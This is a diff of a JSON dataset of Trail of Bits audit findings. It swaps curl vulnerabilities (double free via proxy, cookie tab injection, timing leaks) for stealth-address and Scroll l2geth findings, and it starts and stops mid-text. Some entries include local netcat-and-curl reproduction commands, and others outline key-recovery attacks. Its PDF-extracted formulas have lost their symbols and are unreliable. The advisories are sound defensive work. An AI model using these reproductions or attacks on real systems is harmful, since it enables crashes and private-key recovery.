= 2 1 = ( ||2 ) ( ||1 ) . As a result, she can write 2 = 1 + . Suppose Bob signs messages with hashes (respectively), and he uses the same nonce 2 and to transfer the funds out of 1 2 in both signatures. He will output signatures 1 1 and 1 ) ( , 1 and ) ( , 2 , where = ( * ) , 1 = ( 1 ) + 1 , and = 2 ( 2 + 1 + ) . Subtracting the -values gives us 1 except are known, Alice can recover 1 2 = ( 1 , and thus 1 2 , and 2 ) . Because all the terms = 2 ( ||2 ) . Recommendations Consider using deterministic nonce generation in any stealth-enabled wallets. This is an approach used in multiple elliptic curve digital signature schemes, and can be adapted to ECDSA relatively easily; see RFC 6979 . Also consider root key blinding. Set = ( || ) * + ( || ||\" \" ) * With blinding, private keys take the form = ( || ) + ( || ||\" \" ) Since the terms no longer cancel out, Alice cannot nd , and the attack falls apart. . . Finally, consider using homogeneous key derivation. Set private key for Bob is then = ( || ) + = ( || ) * + . Because Alice does not know . The , she cannot nd , and the attack falls apart. References ECDSA: Handle with Care RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Undetermined" ] }, { - "title": "1. Bad recommendation in libcurl cookie documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "The libcurl documentation recommends that, to enable the cookie store with a blank cookie database, the calling application should use the CURLOPT_COOKIEFILE option with a non-existing le name or plain , as shown in gure 1.1. However, the former recommendationa non-blank lename with a target that does not existcan have unexpected results if a le by that name is unexpectedly present. Figure 1.1: The recommendation in libcurls documentation Exploit Scenario An inexperienced developer uses libcurl in his application, invoking the CURLOPT_COOKIEFILE option and hard-coding a lename that he thinks will never exist (e.g., a long random string), but which could potentially be created on the lesystem. An attacker reverse-engineers his program to determine the lename and path in question, and then uses a separate local le write vulnerability to inject cookies into the application. Recommendations Short term, remove the reference to a non-existing le name; mention only a blank string. Long term, avoid suggesting tricks such as this in documentation when a misuse or misunderstanding of them could result in side eects of which users may be unaware.", + "title": "2. Limited forgeries for related keys ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "If Bob signs a message for an address generated by Alice, Alice can convert it into a valid signature for another address. She cannot, however, control the hash of the message being signed, so this attack is of limited value. As with the related-nonce attack, this attack relies on Alice knowing the dierence in discrete logarithms between two addresses. Exploit Scenario Alice generates addresses 1 = ( ||1 ) * + and 2 = ( ||2 ) * + and deposits funds in each account. As before, Alice knows discrete logs for 1 and , and 2 = 2 . 1 , the dierence of the Bob transfers money out of , generating signature 2 * -coordinate of (where where is the ( , ) of a message with hash , is the nonce). The signature is validated by computing = 1 * + 1 * 2 and verifying that the -coordinate of matches . Alice can convert this into a signature under for a message with hash ' = + . Verifying this signature under , computing 1 1 becomes: = ( + 1 ) * + 1 * 1 1 = * + 1 1 * + 1 * 1 = * + 1 ( 1 + ) * 1 = * + 1 * 2 This is the same relation that makes will be correct. ( , ) a valid signature on a message with hash , so Note that Alice has no control over the value of ' would have to nd a preimage preimages is, to date, a hard problem for SHA-256 and related functions. under the given hash function. Computing , so to make an eective exploit, she ' of ' Recommendations Consider root key blinding, as above. The attack relies on Alice knowing blinding prevents her from learning it. , and root key Consider homogeneous key derivation, as above. Once again, depriving Alice of obviates the attack completely.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "2. Libcurl URI parser accepts invalid characters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "According to RFC 3986 section 2.2, Reserved Characters, reserved = gen-delims / sub-delims gen-delims = \":\" / \"/\" / \"?\" / \"#\" / \"[\" / \"]\" / \"@\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.1: Reserved characters for URIs. Furthermore, the host eld of the URI is dened as follows: host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) ... unreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.2: Valid characters for the URI host eld However, cURL does not seem to strictly adhere to this format, as it accepts characters not included in the above. This behavior is present in both libcurl and the cURL binary. For instance, characters from the gen-delims set, and those not in the reg-name set, are accepted: $ curl -g \"http://foo[]bar\" # from gen-delims curl: (6) Could not resolve host: foo[]bar $ curl -g \"http://foo{}bar\" # outside of reg-name curl: (6) Could not resolve host: foo{}bar Figure 2.3: Valid characters for the URI host eld The exploitability and impact of this issue is not yet well understood; this may be deliberate behavior to account for currently unknown edge-cases or legacy support. Recommendations Short term, determine whether these characters are being allowed for compatibility reasons. If so, it is likely that nothing can be done; if not, however, make the URI parser stricter, rejecting characters that cannot appear in a valid URI as dened by RFC 3986. Long term, add fuzz tests for the URI parser that use forbidden or out-of-scope characters.", + "title": "3. Mutual transactions can be completely deanonymized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "When Alice and Bob both make stealth payments to each other, they generate the same Shared Secret #i for transaction i, which is used to derive destination keys for Bob and Alice: Symbol", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "3. libcurl Alt-Svc parser accepts invalid port numbers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Invalid port numbers in Alt-Svc headers, such as negative numbers, may be accepted by libcurl when presented by an HTTP server. libcurl uses the strtoul function to parse port numbers in Alt-Svc headers. This function will accept and parse negative numbers and represent them as unsigned integers without indicating an error. For example, when an HTTP server provides an invalid port number of -18446744073709543616, cURL parses the number as 8000: * Using HTTP2, server supports multiplexing * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x12d013600) > GET / HTTP/2 > Host: localhost:2443 > user-agent: curl/7.79.1 > accept: */* > < HTTP/2 200 < server: basic-h2-server/1.0 < content-length: 130 < content-type: application/json * Added alt-svc: localhost: 8000 over h3 < alt-svc: h3=\": -18446744073709543616 \" < Figure 3.1: Example cURL session Exploit Scenario A server operator wishes to target cURL clients and serve them alternative content. The operator includes a specially-crafted, invalid Alt-Svc header on the HTTP server responses, indicating that HTTP/3 is available on port -18446744073709543616 , an invalid, negative port number. When users connect to the HTTP server using standards-compliant HTTP client software, their clients ignore the invalid header. However, when users connect using cURL, it interprets the negative number as an unsigned integer and uses the resulting port number, 8000 , to upgrade the next connection to HTTP/3. The server operator hosts alternative content on this other port. Recommendations Short term, improve parsing and validation of Alt-Svc headers so that invalid port values are rejected. Long term, add fuzz and dierential tests to the Alt-Svc parsing code to detect non-standard behavior.", + "title": "4. Allowing invalid public keys may enable DH private key recovery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "Consider the following three assumptions: 1. 2. 3. Alice can add points that are not on the elliptic curve to the public key database, Bob does not verify the public key points, and Bob's scalar multiplication implementation has some specic characteristics. Assumptions 1 and 2 are currently not specied in the specication, which motivates this nding. If these assumptions hold, then Alice can recover Bob's DH key using a complicated attack, based on the CRYPTO 2000 paper by Biehl et al. and the DCC 2005 paper by Ciet et al . What follows is a rough sketch of the attack. For more details, see the reference publications, which also detail the specic characteristics for Assumption 3. Exploit Scenario Alice roughly follows the following steps: 1. Find a point ' which is not on the curve used for ECDH, and a. b. when used in Bobs scalar multiplication, is eectively on a dierent curve ' 2. 3. 4. with (a subgroup of) small prime order Brute-force all possible values of addresses with shared secret ' for ( ' || 0 ) the unique stealth address associated with ' = ( ' ) ' . ' . 0 < ' , i.e., ' = , and sends funds to all + ( '|| 0 ) * = . ' . This happens because Monitor all resulting addresses associated with until Bob withdraws funds from Repeat steps 13 for new points ' with dierent small prime orders ' to recover ' . 5. Use the Chinese Remainder Theorem to recover from ' . As a result, Alice can now track all stealth payments made to Bob (but cannot steal funds). To understand the complexity of this attack, it is sucient for Alice to repeat steps 13 for the rst 44 primes (numbers between 2 and 193). This requires Alice to make 3,831 payments in total (corresponding to the sum of the rst 44 primes). There is a tradeo where Alice uses fewer primes, which means that fewer transactions are needed. However, it means that Alice does not recover the full b dh . To compensate for this, Alice can brute-force the discrete logarithm of B dh guided by the partial information on b dh . Because the attack compromises anonymity for a particular user without giving access to funds, we consider this issue to have medium severity. As this is a complicated attack with various assumptions that requires Bob to access the funds from all his stealth addresses, we consider this issue to have high diculty. Recommendations The specication should enforce that public keys are validated for correctness, both when they are added to the public database and when they are used by senders and receivers. These validations should include point-on-curve checks, small-order-subgroup checks (if applicable), and point-at-innity checks. References Dierential Fault Attacks on Elliptic Curve Cryptosystems, Biehl et al., 2000 Elliptic Curve Cryptosystems in the Presence of Permanent and Transient Faults, Ciet et al.,", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "4. Non-constant-time comparison of secrets ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Several cases were discovered in which possibly user-supplied values are checked against a known secret using non-constant-time comparison. In cases where an attacker can accurately time how long it takes for the application to fail validation of submitted data that he controls, such behavior could leak information about the secret itself, allowing the attacker to brute-force it in linear time. In the example below, credentials are checked via Curl_safecmp() , which is a memory-safe, but not constant-time, wrapper around strcmp() . This is used to determine whether or not to reuse an existing TLS connection. #ifdef USE_TLS_SRP Curl_safecmp(data->username, needle->username) && Curl_safecmp(data->password, needle->password) && (data->authtype == needle->authtype) && #endif Figure 4.1: lib/url.c , lines 148 through 152. Credentials checked using a memory-safe, but not constant-time, wrapper around strcmp() The above is one example out of several cases found, all of which are noted above. Exploit Scenario An application uses a libcurl build with TLS-SRP enabled and allows multiple users to make TLS connections to a remote server. An attacker times how quickly cURL responds to his requests to create a connection, and thereby gradually works out the credentials associated with an existing connection. Eventually, he is able to submit a request with exactly the same SSL conguration such that another users existing connection is reused. Recommendations Short term, introduce a method, e.g. Curl_constcmp() , which does a constant-time comparison of two stringsthat is, it scans both strings exactly once in their entirety. Long term, compare secrets to user-submitted values using only constant-time algorithms.", + "title": "2. Multiple instances of unchecked errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "There are multiple instances of unchecked errors in the l2geth codebase, which could lead to undened behavior when errors are raised. One such unhandled error is shown in gure 2.1. A comprehensive list of unchecked errors is provided in appendix C. if len(requests) == 0 && req.deps == 0 { s.commit(req) } else { Figure 2.1: The Sync.commit() function returns an error that is unhandled, which could lead to invalid commitments or a frozen chain. (go-ethereum/trie/sync.go#296298) Unchecked errors also make the system vulnerable to denial-of-service attacks; they could allow attackers to trigger nil dereference panics in the sequencer node. Exploit Scenario An attacker identies a way to cause a zkTrie commitment to fail, allowing invalid data to be silently committed by the sequencer. Recommendations Short term, add error checks to all functions that can emit Go errors. Long term, add the tools errcheck and ineffassign to l2geths build pipeline. These tools can be used to detect errors and prevent builds containing unchecked errors from being deployed.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "5. Tab injection in cookie le ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When libcurl makes an HTTP request, the cookie jar le is overwritten to store the cookies, but the storage format uses tabs to separate key pieces of information. The cookie parsing code for HTTP headers strips the leading and trailing tabs from cookie keys and values, but it does not reject cookies with tabs inside the keys or values. In the snippet of lib/cookie.c below, Curl_cookie_add() parses tab-separated cookie data via strtok_r() and uses a switch-based state machine to interpret specic parts as key information: firstptr = strtok_r(lineptr, \"\\t\" , &tok_buf); /* tokenize it on the TAB */ Figure 5.1: Parsing tab-separated cookie data via strtok_r() Exploit Scenario A webpage returns a Set-Cookie header with a tab character in the cookie name. When a cookie le is saved from cURL for this page, the part of the name before the tab is taken as the key, and the part after the tab is taken as the value. The next time the cookie le is loaded, these two values will be used. % echo \"HTTP/1.1 200 OK\\r\\nSet-Cookie: foo\\tbar=\\r\\n\\r\\n\\r\\n\"|nc -l 8000 & % curl -v -c /tmp/cookies.txt http://localhost:8000 * Trying 127.0.0.1:8000... * Connected to localhost (127.0.0.1) port 8000 (#0) > GET / HTTP/1.1 > Host: localhost:8000 > User-Agent: curl/7.79.1 > Accept: */* * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK * Added cookie foo bar=\"\" for domain localhost, path /, expire 0 < Set-Cookie: foo bar= * no chunk, no close, no size. Assume close to signal end Figure 5.2: Sending a cookie with name foo\\tbar , and no value. % cat /tmp/cookies.txt | tail - localhost FALSE / FALSE 0 foo bar Figure 5.3: Sending a cookie with name foo\\tbar and no value Recommendations Short term, either reject any cookie with a tab in its key (as \\t is not a valid character for cookie keys, according to the relevant RFC), or escape or quote tab characters that appear in cookie keys. Long term, do not assume that external data will follow the intended specication. Always account for the presence of special characters in such inputs.", + "title": "3. Risk of double-spend attacks due to use of single-node Clique consensus without nality API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth uses the proof-of-authority Clique consensus protocol, dened by EIP-255. This consensus type is not designed for single-node networks, and an attacker-controlled sequencer node may produce multiple conicting forks of the chain to facilitate double-spend attacks. The severity of this nding is compounded by the fact that there is no API for an end user to determine whether their transaction has been nalized by L1, forcing L2 users to use ineective block/time delays to determine nality. Clique consensus was originally designed as a replacement for proof-of-work consensus for Ethereum testnets. It uses the same fork choice rule as Ethereums proof-of-work consensus; the fork with the highest diculty should be considered the canonical fork. Clique consensus does not use proof-of-work and cannot update block diculty using the traditional calculation; instead, block diculty may be one of two values: 1 if the block was mined by the designated signer for the block height 2 if the block was mined by a non-designated signer for the block height This means that in a network with only one authorized signer, all of the blocks and forks produced by the sequencer will have the same diculty value, making it impossible for syncing nodes to determine which fork is canonical at the given block height. In a normal proof-of-work network, one of the proposed blocks will have a higher diculty value, causing syncing nodes to re-organize and drop the block with the lower diculty value. In a single-validator proof-of-authority network, neither block will be preferred, so each syncing node will simply prefer the rst block they received. This nding is not unique to l2geth; it will be endemic to all L2 systems that have only one authorized sequencer. Exploit Scenario An attacker acquires control over l2geths centralized sequencer node. The attacker modies the node to prove two forks: one fork containing a deposit transaction to a centralized exchange, and one fork with no such deposit transaction. The attacker publishes the rst fork, and the centralized exchange picks up and processes the deposit transaction. The attacker continues to produce blocks on the second private fork. Once the exchange processes the deposit, the attacker stops generating blocks on the public fork, generates an extra block to make the private fork longer than the public fork, then publishes the private fork to cause a re-organization across syncing nodes. This attack must be completed before the sequencer is required to publish a proof to L1. Recommendations Short term, add API methods and documentation to ensure that bridges and centralized exchanges query only for transactions that have been proved and nalized on the L1 network. Long term, decentralize the sequencer in such a way that a majority of sequencers must collude in order to successfully execute a double-spend attack. This design should be accompanied by a slashing mechanism to penalize sequencers that sign conicting blocks.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -1500,9 +1500,9 @@ ] }, { - "title": "6. Standard output/input/error may not be opened ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "The function main_checkfds() is used to ensure that le descriptors 0, 1, and 2 (stdin, stdout, and stderr) are open before curl starts to run. This is necessary to avoid the case wherein, if one of those descriptors fails to open initially, the next network socket opened by cURL may gain an FD number of 0, 1, or 2, resulting in what should be local input/output being received from or sent to a network socket instead. However, pipe errors actually result in the same outcome as success: static void main_checkfds ( void ) { #ifdef HAVE_PIPE int fd[ 2 ] = { STDIN_FILENO, STDIN_FILENO }; while (fd[ 0 ] == STDIN_FILENO || fd[ 0 ] == STDOUT_FILENO || fd[ 0 ] == STDERR_FILENO || fd[ 1 ] == STDIN_FILENO || fd[ 1 ] == STDOUT_FILENO || fd[ 1 ] == STDERR_FILENO) if (pipe(fd) < 0 ) return ; /* Out of handles. This isn't really a big problem now, but will be when we try to create a socket later. */ close(fd[ 0 ]); close(fd[ 1 ]); #endif } Figure 6.1: tool_main.c:83105 , lines 83 through 105 Though the comment notes that an out-of-handles condition would result in a failure later on in the application, there may be cases where this is not truee.g., the maximum number of handles has been reached at the time of this check, but handles are closed between it and the next attempt to create a socket. In such a case, execution might continue as normal, with stdin/out/err being redirected to an unexpected location. Recommendations Short term, use fcntl() to check if stdin/out/err are open. If they are not, exit the program if the pipe function fails. Long term, do not assume that execution will fail later; fail early in cases like these.", + "title": "4. Improper use of panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth overuses Gos panic mechanism in lieu of Gos built-in error propagation system, introducing opportunities for denial of service. Go has two primary methods through which errors can be reported or propagated up the call stack: the panic method and Go errors. The use of panic is not recommended, as it is unrecoverable: when an operation panics, the Go program is terminated and must be restarted. The use of panic creates a denial-of-service vector that is especially applicable to a centralized sequencer, as a restart of the sequencer would eectively halt the L2 network until the sequencer recovers. Some example uses of panic are presented in gures 4.1 to 4.3. These do not represent an exhaustive list of panic statements in the codebase, and the Scroll team should investigate each use of panic in its modied code to verify whether it truly represents an unrecoverable error. func sanityCheckByte32Key(b []byte) { if len(b) != 32 && len(b) != 20 { panic(fmt.Errorf(\"do not support length except for 120bit and 256bit now. data: %v len: %v\", b, len(b))) } } Figure 4.1: The sanityCheckByte32Key function panics when a trie key does not match the expected size. This function may be called during the execution of certain RPC requests. (go-ethereum/trie/zk_trie.go#4448) func (s *StateAccount) MarshalFields() ([]zkt.Byte32, uint32) { fields := make([]zkt.Byte32, 5) if s.Balance == nil { panic(\"StateAccount balance nil\") } if !utils.CheckBigIntInField(s.Balance) { panic(\"StateAccount balance overflow\") } if !utils.CheckBigIntInField(s.Root.Big()) { panic(\"StateAccount root overflow\") } if !utils.CheckBigIntInField(new(big.Int).SetBytes(s.PoseidonCodeHash)) { panic(\"StateAccount poseidonCodeHash overflow\") } Figure 4.2: The MarshalFields function panics when attempting to marshal an object that does not match certain requirements. This function may be called during the execution of certain RPC requests. (go-ethereum/core/types/state_account_marshalling.go#4764) func (t *ProofTracer) MarkDeletion(key []byte) { if path, existed := t.emptyTermPaths[string(key)]; existed { // copy empty node terminated path for final scanning t.rawPaths[string(key)] = path } else if path, existed = t.rawPaths[string(key)]; existed { // sanity check leafNode := path[len(path)-1] if leafNode.Type != zktrie.NodeTypeLeaf { panic(\"all path recorded in proofTrace should be ended with leafNode\") } Figure 4.3: The MarkDeletion function panics when the proof tracer contains a path that does not terminate in a leaf node. This function may be called when a syncing node attempts to process an invalid, malicious proof that an attacker has gossiped on the network. (go-ethereum/trie/zktrie_deletionproof.go#120130) Exploit Scenario An attacker identies an error path that terminates with a panic that can be triggered by a malformed RPC request or proof payload. The attacker leverages this issue to either disrupt the sequencers operation or prevent follower/syncing nodes from operating properly. Recommendations Short term, review all uses of panic that have been introduced by Scrolls changes to go-ethereum. Ensure that these uses of panic truly represent unrecoverable errors, and if not, add error handling logic to recover from the errors. Long term, annotate all valid uses of panic with explanations for why the errors are unrecoverable and, if applicable, how to prevent the unrecoverable conditions from being triggered. l2geths code review process must also be updated to verify that this documentation exists for new uses of panic that are introduced later.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1510,29 +1510,19 @@ ] }, { - "title": "7. Double free when using HTTP proxy with specic protocols ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Using cURL with proxy connection and dict, gopher, LDAP, or telnet protocol triggers a double free vulnerability (gure 7.1). The connect_init function allocates a memory block for a connectdata struct (gure 7.2). After the connection, cURL frees the allocated buer in the conn_free function (gure 7.3), which is freed for the second time in the Curl_free_request_state frees, which uses the Curl_safefree function on elements of the Curl_easy struct (gure 7.4). This double free was also not detected in release builds during our testing the glibc allocator checks may fail to detect such cases on some occasions. The two frees success indicates that future memory allocations made by the program will return the same pointer twice. This may enable exploitation of cURL if the allocated objects contain data controlled by an attacker. Additionally, if this vulnerability also triggers in libcurlwhich we believe it shouldit may enable the exploitation of programs that depend on libcurl. $ nc -l 1337 | echo 'test' & # Imitation of a proxy server using netcat $ curl -x http://test:test@127.0.0.1:1337 dict://127.0.0.1 2069694==ERROR: AddressSanitizer: attempting double-free on 0x617000000780 in thread T0: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf3afe in Curl_free_request_state curl/lib/url.c:2259:3 #2 0x7f1eeeaf3afe in Curl_close curl/lib/url.c:421:3 #3 0x7f1eeea30943 in curl_easy_cleanup curl/lib/easy.c:798:3 #4 0x4e07df in post_per_transfer curl/src/tool_operate.c:656:3 #5 0x4dee58 in serial_transfers curl/src/tool_operate.c:2434:18 #6 0x4dee58 in run_all_transfers curl/src/tool_operate.c:2620:16 #7 0x4dee58 in operate curl/src/tool_operate.c:2732:18 #8 0x4dcf73 in main curl/src/tool_main.c:276:14 #9 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x41c7cd in _start (curl/src/.libs/curl+0x41c7cd) 0x617000000780 is located 0 bytes inside of 664-byte region [0x617000000780,0x617000000a18) freed by thread T0 here: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf6094 in conn_free curl/lib/url.c:814:3 #2 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684: #3 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #4 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #5 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #6 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #7 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #8 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #9 0x4dcf73 in main curl/src/tool_main.c:276:14 #10 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x495082 in calloc (curl/src/.libs/curl+0x495082) #1 0x7f1eeea6d642 in connect_init curl/lib/http_proxy.c:174:9 #2 0x7f1eeea6d642 in Curl_proxyCONNECT curl/lib/http_proxy.c:1061:14 #3 0x7f1eeea6d1f2 in Curl_proxy_connect curl/lib/http_proxy.c:118:14 #4 0x7f1eeea94c33 in multi_runsingle curl/lib/multi.c:2028:16 #5 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684:14 #6 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #7 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #8 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #9 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #10 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #11 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #12 0x4dcf73 in main curl/src/tool_main.c:276:14 #13 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: double-free (curl/src/.libs/curl+0x494c8d) in free Figure 7.1: Reproducing double free vulnerability with ASAN log 158 static CURLcode connect_init ( struct Curl_easy *data, bool reinit) // (...) 174 s = calloc( 1 , sizeof ( struct http_connect_state )); Figure 7.2: Allocating a block of memory that is freed twice ( curl/lib/http_proxy.c#158174 ) 787 static void conn_free ( struct connectdata *conn) // (...) 814 Curl_safefree(conn->connect_state); Figure 7.3: The conn_free function that frees the http_connect_state struct for HTTP CONNECT ( curl/lib/url.c#787814 ) void Curl_free_request_state ( struct Curl_easy *data) 2257 2258 { 2259 2260 Curl_safefree(data->req.p.http); Curl_safefree(data->req.newurl); Figure 7.4: The Curl_free_request_state function that frees elements in the Curl_easy struct, which leads to a double free vulnerability ( curl/lib/url.c#22572260 ) Exploit Scenario An attacker nds a way to exploit the double free vulnerability described in this nding either in cURL or in a program that uses libcurl and gets remote code execution on the machine from which the cURL code was executed. Recommendations Short term, x the double free vulnerability described in this nding. Long term, expand cURLs unit tests and fuzz tests to cover dierent types of proxies for supported protocols. Also, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the approach presented in the argv-fuzz-inl.h from the AFL++ project. This will force the fuzzer to build an argv pointer array (which points to arguments passed to the cURL) from NULL-delimited standard input. Finally, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or on cURLs manual.", - "labels": [ - "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" - ] - }, - { - "title": "8. Some ags override previous instances of themselves ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Some cURL ags, when provided multiple times, overrides themselves and eectively use the last ag provided. If a ag makes cURL invocations security options more strict, then accidental overwriting may weaken the desired security. The identied ag with this property is the --crlfile command-line option. It allows users to pass a PEM-formatted certicate revocation list to cURL. --crlfile List that may specify peer certificates that are to be considered revoked. (TLS) Provide a file using PEM format with a Certificate Revocation If this option is used several times, the last one will be used. Example: curl --crlfile rejects.txt https://example.com Added in 7.19.7. Figure 8.1: The description of the --crlfile option Exploit Scenario A user wishes for cURL to reject certicates specied across multiple certicate revocation lists. He unwittingly uses the --crlfile ag multiple times, dropping all but the last-specied list. Requests the user sends with cURL are intercepted by a Man-in-the-Middle attacker, who uses a known-compromised certicate to bypass TLS protections. Recommendations Short term, change the behavior of --crlfile to append new certicates to the revocation list, not to replace those specied earlier. If backwards compatibility prevents this, have cURL issue a warning such as --crlfile specified multiple times, using only . Long term, ensure that behavior, such as how multiple instances of a command-line argument are handled, is consistent throughout the application. Issue a warning when a security-relevant ag is provided multiple times.", + "title": "5. Risk of panic from nil dereference due to awed error reporting in addressToKey ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "The addressToKey function, shown in gure 5.1, returns a nil pointer instead of a Go error when an error is returned by the preImage.Hash() function, which will cause a nil dereference panic in the NewZkTrieProofWriter function, as shown in gure 5.2. If the error generated by preImage.Hash() is unrecoverable, the addressToKey function should panic instead of silently returning a nil pointer. func addressToKey(addr common.Address) *zkt.Hash { var preImage zkt.Byte32 copy(preImage[:], addr.Bytes()) h, err := preImage.Hash() if err != nil { log.Error(\"hash failure\", \"preImage\", hexutil.Encode(preImage[:])) return nil } return zkt.NewHashFromBigInt(h) } Figure 5.1: The addressToKey function returns a nil pointer to zkt.Hash when an error is returned by preImage.Hash(). (go-ethereum/trie/zkproof/writer.go#3141) func NewZkTrieProofWriter(storage *types.StorageTrace) (*zktrieProofWriter, error) { underlayerDb := memorydb.New() zkDb := trie.NewZktrieDatabase(underlayerDb) accounts := make(map[common.Address]*types.StateAccount) // resuming proof bytes to underlayerDb for addrs, proof := range storage.Proofs { if n := resumeProofs(proof, underlayerDb); n != nil { addr := common.HexToAddress(addrs) if n.Type == zktrie.NodeTypeEmpty { accounts[addr] = nil } else if acc, err := types.UnmarshalStateAccount(n.Data()); err == nil { if bytes.Equal(n.NodeKey[:], addressToKey(addr)[:]) { accounts[addr] = acc Figure 5.2: The addressToKey function is consumed by NewZkTrieProofWriter, which will attempt to dereference the nil pointer and generate a system panic. (go-ethereum/trie/zkproof/writer.go#152167) Recommendations Short term, modify addressToKey so that it either returns an error that its calling functions can propagate or, if the error is unrecoverable, panics instead of returning a nil pointer. Long term, update Scrolls code review and style guidelines to reect that errors must be propagated by Gos error system or must halt the program by using panic.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "9. Cookies are not stripped after redirect ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "If cookies are passed to cURL via the --cookie ag, they will not be stripped if the target responds with a redirect. RFC 9110 section 15.4, Redirection 3xx , does not specify whether or not cookies should be stripped during a redirect; as such, it may be better to err on the side of caution and strip them by default if the origin changed. The recommended behavior would match the current behavior with cookie jar (i.e., when a server sets a new cookie and requests a redirect) and Authorization header (which is stripped on cross-origin redirects). Recommendations Short term, if backwards compatibility would not prohibit such a change, strip cookies upon a redirect to a dierent origin by default and provide a command-line ag that enables the previous behavior (or extend the --location-trusted ag). Long term, in cases where a specication is ambiguous and practicality allows, always default to the most secure possible interpretation. Extend tests to check for behavior of passing data after redirection.", + "title": "6. Risk of transaction pool admission denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geths changes to the transaction pool include an ECDSA recovery operation at the beginning of the pools transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencers resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can aord the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in gure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in gure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace(\"Discarding already known transaction\", \"hash\", hash) knownTxMeter.Mark(1) return false, 